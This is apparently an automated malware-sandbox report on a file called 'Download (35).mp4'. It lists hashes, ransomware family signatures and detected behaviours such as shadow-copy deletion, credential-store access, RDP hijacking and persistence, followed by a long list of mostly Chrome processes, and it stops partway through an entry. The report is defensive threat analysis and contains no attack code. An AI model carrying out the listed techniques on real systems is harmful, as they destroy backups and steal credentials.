Analysis

  • max time kernel
    1050s
  • max time network
    1050s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250410-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/04/2025, 05:22

General

  • Target

    Download (35).mp4

  • Size

    14.0MB

  • MD5

    7f09d022359cded16c5f79858e62183d

  • SHA1

    c8c8041a68818ba5794b8fcb2fb97b5404269681

  • SHA256

    1f5859f23a8b5783f1fba87a0f87bdf26e07c13d5a273a5e9f947544d48a4b73

  • SHA512

    57b739bcb6416f83b0376d689edd6dcdb9ee6a7058f8e2cc614d4156481388afee45663de3267739fab91716aa29461078d60c7cc0d56e015de874af4ba955fa

  • SSDEEP

    393216:yTkXFbqHWUZLbzP18iBkTOTQvYKkfLH4Wo8tSiSo:y4XWWUZLbzPHTIYKkTH4Wo6b

Malware Config

Signatures

  • BadRabbit

    Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.

  • Badrabbit family
  • CryptoLocker

    Ransomware family with multiple variants.

  • Cryptolocker family
  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

  • Dharma family
  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Renames multiple (828) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 8 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 4 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Sets service image path in registry 2 TTPs 9 IoCs
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 16 IoCs
  • Impair Defenses: Safe Mode Boot 1 TTPs 14 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 60 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • Drops file in System32 directory 2 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 52 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: LoadsDriver 32 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\Download (35).mp4"
    1⤵
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3184
    • C:\Windows\SysWOW64\unregmp2.exe
      "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1316
      • C:\Windows\system32\unregmp2.exe
        "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
        3⤵
        • Enumerates connected drives
        • Suspicious use of AdjustPrivilegeToken
        PID:2012
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
    1⤵
    • Drops file in Windows directory
    PID:1464
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x504 0x2f8
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4608
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3160
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffc2cebdcf8,0x7ffc2cebdd04,0x7ffc2cebdd10
      2⤵
        PID:4320
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1960 /prefetch:2
        2⤵
          PID:2312
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1924,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2156 /prefetch:3
          2⤵
            PID:3716
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2444 /prefetch:8
            2⤵
              PID:988
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3220 /prefetch:1
              2⤵
                PID:1912
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3248 /prefetch:1
                2⤵
                  PID:4352
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4460,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4440 /prefetch:2
                  2⤵
                    PID:5968
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4744,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4768 /prefetch:1
                    2⤵
                      PID:2340
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5032,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5056 /prefetch:1
                      2⤵
                        PID:5928
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5756,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5772 /prefetch:8
                        2⤵
                          PID:3872
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5816,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5860 /prefetch:8
                          2⤵
                            PID:316
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --instant-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5796,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5776 /prefetch:1
                            2⤵
                              PID:1076
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5944,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6012 /prefetch:1
                              2⤵
                                PID:3760
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5068,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5164 /prefetch:1
                                2⤵
                                  PID:2552
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5592,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5772 /prefetch:1
                                  2⤵
                                    PID:5560
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5372,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5792 /prefetch:1
                                    2⤵
                                      PID:2864
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6400,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6424 /prefetch:1
                                      2⤵
                                        PID:2164
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --instant-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6208,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6744 /prefetch:1
                                        2⤵
                                          PID:4732
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=7016,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6992 /prefetch:1
                                          2⤵
                                            PID:3188
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6796,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6820 /prefetch:1
                                            2⤵
                                              PID:3572
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6472,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6508 /prefetch:8
                                              2⤵
                                                PID:1636
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6484,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7132 /prefetch:8
                                                2⤵
                                                  PID:4728
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6496,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6528 /prefetch:8
                                                  2⤵
                                                    PID:5876
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=4528,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4532 /prefetch:1
                                                    2⤵
                                                      PID:3776
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6456,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6792 /prefetch:1
                                                      2⤵
                                                        PID:2680
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6604,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6764 /prefetch:1
                                                        2⤵
                                                          PID:1324
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6632,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6768 /prefetch:1
                                                          2⤵
                                                            PID:2924
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=7256,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7284 /prefetch:1
                                                            2⤵
                                                              PID:3252
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6584,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7440 /prefetch:1
                                                              2⤵
                                                                PID:4784
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=7432,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7576 /prefetch:1
                                                                2⤵
                                                                  PID:3212
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=7752,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7776 /prefetch:1
                                                                  2⤵
                                                                    PID:4840
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=7912,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7944 /prefetch:1
                                                                    2⤵
                                                                      PID:6012
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=7924,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8080 /prefetch:1
                                                                      2⤵
                                                                        PID:5896
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=8348,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8268 /prefetch:1
                                                                        2⤵
                                                                          PID:4796
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=8508,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8500 /prefetch:1
                                                                          2⤵
                                                                            PID:2532
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=8692,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8672 /prefetch:1
                                                                            2⤵
                                                                              PID:100
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=8352,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8892 /prefetch:1
                                                                              2⤵
                                                                                PID:1204
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=8992,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=9016 /prefetch:1
                                                                                2⤵
                                                                                  PID:1676
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=9040,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=9064 /prefetch:1
                                                                                  2⤵
                                                                                    PID:6040
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=9180,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=9324 /prefetch:1
                                                                                    2⤵
                                                                                      PID:5020
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=9460,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=9476 /prefetch:1
                                                                                      2⤵
                                                                                        PID:1508
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=9624,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=9612 /prefetch:1
                                                                                        2⤵
                                                                                          PID:712
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=8468,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8424 /prefetch:1
                                                                                          2⤵
                                                                                            PID:3228
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=10160,i,10595413844662303128,4666861237221770886,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=10104 /prefetch:1
                                                                                            2⤵
                                                                                              PID:5616
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
